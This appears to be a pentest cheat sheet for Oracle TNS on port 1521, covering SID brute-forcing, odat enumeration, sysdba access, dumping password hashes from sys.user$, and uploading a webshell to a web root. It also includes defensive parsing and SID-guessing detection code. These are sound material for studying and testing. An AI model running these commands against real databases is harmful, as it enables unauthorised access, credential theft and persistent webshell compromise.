# Oracle TNS (1521)

<details>

<summary>Protocol Information</summary>

Oracle TNS is a communication protocol that carries traffic between Oracle databases and applications over a network. It is often used with other Oracle services such as Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many others. It provides security through different levels of encryption, and it offers error reporting and logging.

In Oracle RDBMS, a **`System Identifier (SID)`** is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. For example, in an Oracle RAC environment, a single physical database is accessible from multiple Oracle instances spread across different nodes in a cluster. Each instance has its own unique SID, but all instances share the same set of database files. This configuration provides scalability and high availability. SIDs are an essential part of the connection process, because they identify the specific database instance the client wants to connect to.

</details>

## Port

<table data-header-hidden><thead><tr><th width="166">Port</th><th>Description</th></tr></thead><tbody><tr><td><mark style="color:green;"><strong>1521</strong></mark><strong> TCP</strong></td><td>Oracle TNS</td></tr></tbody></table>

## Config File

In `$ORACLE_HOME/network/admin/`:

* **`tnsnames.ora`** : Each database or service has a unique entry in the `tnsnames.ora` file, containing the information clients need to connect to it. The entry consists of a name for the service, the network location of the service, and the name of the database or service that clients must use when connecting. In other words, it resolves service names into network addresses, telling clients how to find the databases.
* **`listener.ora`** : A server-side configuration file that defines the properties and parameters of the listener process, which receives incoming client requests and forwards them to the appropriate Oracle database instance. In other words, it configures the listener, the program that sits on the server and listens for connection requests, telling the server how to listen for client requests.
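The name-to-address resolution described above, and the SID versus service-name distinction from the protocol notes, as an added example that is not part of the original page: a small Python parser for the nested `(KEY = value)` syntax of `tnsnames.ora`. The aliases, hosts and names in the sample are constructed, and the function names are this example's own.

```python
import re

# Constructed sample: aliases, hosts, SID and service name are hypothetical.
SAMPLE_TNSNAMES = """
ORCL_PROD = (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521))
    (CONNECT_DATA = (SID = ORCL)))
SALES_RAC = (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = rac1.example.internal)(PORT = 1521))
      (ADDRESS = (PROTOCOL = TCP)(HOST = rac2.example.internal)(PORT = 1521)))
    (CONNECT_DATA = (SERVICE_NAME = sales.example.internal)))
"""

def _group(tok, i):
    """Parse '(KEY = literal)' or '(KEY = (group)(group)...)' at tok[i]."""
    if tok[i] != "(" or tok[i + 2] != "=":
        raise ValueError(f"expected '(KEY =' at token {i}")
    key, i, value = tok[i + 1].upper(), i + 3, {}
    while tok[i] == "(":                 # nested groups; a key may repeat
        k, v, i = _group(tok, i)
        value.setdefault(k, []).append(v)
    if not value and tok[i] != ")":      # plain literal such as TCP or 1521
        value, i = tok[i], i + 1
    if tok[i] != ")":
        raise ValueError(f"unbalanced parentheses at token {i}")
    return key, value, i + 1

def parse_tnsnames(text):
    """Return {ALIAS: body of its top-level group}; '#' starts a comment."""
    # Four empty padding tokens make truncated input fail with ValueError.
    tok = re.findall(r"[()=]|[^\s()=]+", re.sub(r"#.*", "", text)) + [""] * 4
    out, i = {}, 0
    while tok[i]:
        alias = tok[i].upper()
        _, out[alias], i = _group(tok, i + 2)
    return out

def _find(node, key):
    """Yield every group named key anywhere below node."""
    for k, groups in (node.items() if isinstance(node, dict) else ()):
        for g in groups:
            if k == key:
                yield g
            yield from _find(g, key)

def resolve(entries, alias):
    """Resolve alias to [(host, port, 'SID' | 'SERVICE_NAME', name), ...]."""
    desc = entries[alias.upper()]
    cd = next(_find(desc, "CONNECT_DATA"))
    kind = "SID" if "SID" in cd else "SERVICE_NAME"
    return [(a["HOST"][0], int(a["PORT"][0]), kind, cd[kind][0])
            for a in _find(desc, "ADDRESS")]
```

Reviewing the resolved entries shows which hosts and instance names a client file discloses, which is useful when auditing what a leaked `tnsnames.ora` would reveal.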

## Interact

Installation of the necessary tools:

{% code overflow="wrap" %}

```bash
#!/bin/bash
# Source this script (". ./script.sh") so the exported variables stay set in your shell.

# System packages and ODAT with its submodules
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update

# Oracle Instant Client (basic + sqlplus); both archives unzip into ./instantclient_21_12
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip

# Absolute paths, so the libraries and sqlplus resolve from any working directory
export LD_LIBRARY_PATH="$PWD/instantclient_21_12:$LD_LIBRARY_PATH"
export PATH="$PWD/instantclient_21_12:$PATH"

# Python dependencies used by ODAT
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

{% endcode %}

Documentation [HERE](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985).

{% code overflow="wrap" %}

```bash
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID>
```

{% endcode %}

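```sql
-- Tables visible to the current user
select table_name from all_tables;
-- Roles granted to the current user
select * from user_role_privs;
-- Account names and stored password hashes (requires access to sys.user$)
select name, password from sys.user$;
```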

If you have an error with `sqlplus`:

{% code overflow="wrap" %}

```bash
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
# or
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
```

{% endcode %}

## Attacks

### SID Bruteforcing

Nmap NSE: `--script oracle-sid-brute`
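How SID guessing shows up on the server side, as an added detection example that is not part of the original page: it flags sources whose connection attempts were rejected for several different unknown SIDs. It assumes the text `listener.log` layout `timestamp * connect data * address * event * SID * return code` and that return code 12505 (TNS-12505) marks an unknown SID; the log lines, addresses and threshold are constructed.

```python
import re
from collections import defaultdict

UNKNOWN_SID = 12505  # TNS-12505: listener does not know the requested SID

# Constructed listener.log records (hypothetical hosts, SIDs and times).
_FMT = ("12-MAR-2024 10:{m:02d}:00 * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=ws)(USER=))) * "
        "(ADDRESS=(PROTOCOL=tcp)(HOST={src})(PORT=40000)) * establish * {sid} * {code}")
SAMPLE_LOG = [_FMT.format(m=m, sid=s, src=h, code=c) for m, (h, s, c) in enumerate([
    ("10.0.0.20", "ORCL", 0), ("10.0.0.20", "ORCLL", 12505),
    ("10.0.0.99", "XE", 12505), ("10.0.0.99", "TEST", 12505),
    ("10.0.0.99", "PROD", 12505), ("10.0.0.99", "DEV", 12505),
    ("10.0.0.99", "ORCL", 0)])]
# Error text lines follow failed records in the log and must be skipped.
SAMPLE_LOG.insert(3, "TNS-12505: TNS:listener does not currently know of SID "
                     "given in connect descriptor")

def parse_line(line):
    """Return (source_ip, sid, return_code) for an 'establish' record, else None."""
    parts = line.split(" * ")
    if len(parts) != 6 or parts[3].strip().lower() != "establish":
        return None
    sid = re.search(r"\(SID=([^)]*)\)", parts[1], re.I)
    src = re.search(r"\(HOST=([^)]+)\)", parts[2], re.I)  # client address field
    code = parts[5].strip()
    if not (sid and src and code.isdigit()):
        return None
    return src.group(1), sid.group(1).upper(), int(code)

def sid_guessing_sources(lines, min_rejected=3):
    """Map each source with >= min_rejected distinct rejected SIDs to the SIDs
    it tried and the SIDs the listener accepted from it (return code 0)."""
    rejected, accepted = defaultdict(set), defaultdict(set)
    for src, sid, code in filter(None, map(parse_line, lines)):
        if code == UNKNOWN_SID:
            rejected[src].add(sid)
        elif code == 0:
            accepted[src].add(sid)
    return {src: {"rejected": sorted(sids), "accepted": sorted(accepted[src])}
            for src, sids in rejected.items() if len(sids) >= min_rejected}
```

An `accepted` SID only means the listener handed the connection to an instance, not that a login succeeded; it tells the responder which instance name the source has learned.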

### Enumeration with [odat](https://github.com/quentinhardy/odat)

```bash
./odat.py all -s <IP>
```

### PrivEsc to sysdba

{% code overflow="wrap" %}

```bash
sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID> as sysdba
```

{% endcode %}

```sql
-- Roles granted to the session after connecting as sysdba
select * from user_role_privs;
-- Account names and stored password hashes
select name, password from sys.user$;
```

### Upload webshell to website (if present) with [odat](https://github.com/quentinhardy/odat)

{% code overflow="wrap" %}

```bash
./odat.py utlfile -s <IP> -d <SID> -U <USER> -P <PASS> --sysdba --putFile <PATH> <NameFileOnServer> ./<myFile>
# ex. <PATH> : C:\\inetpub\\wwwroot
```

{% endcode %}


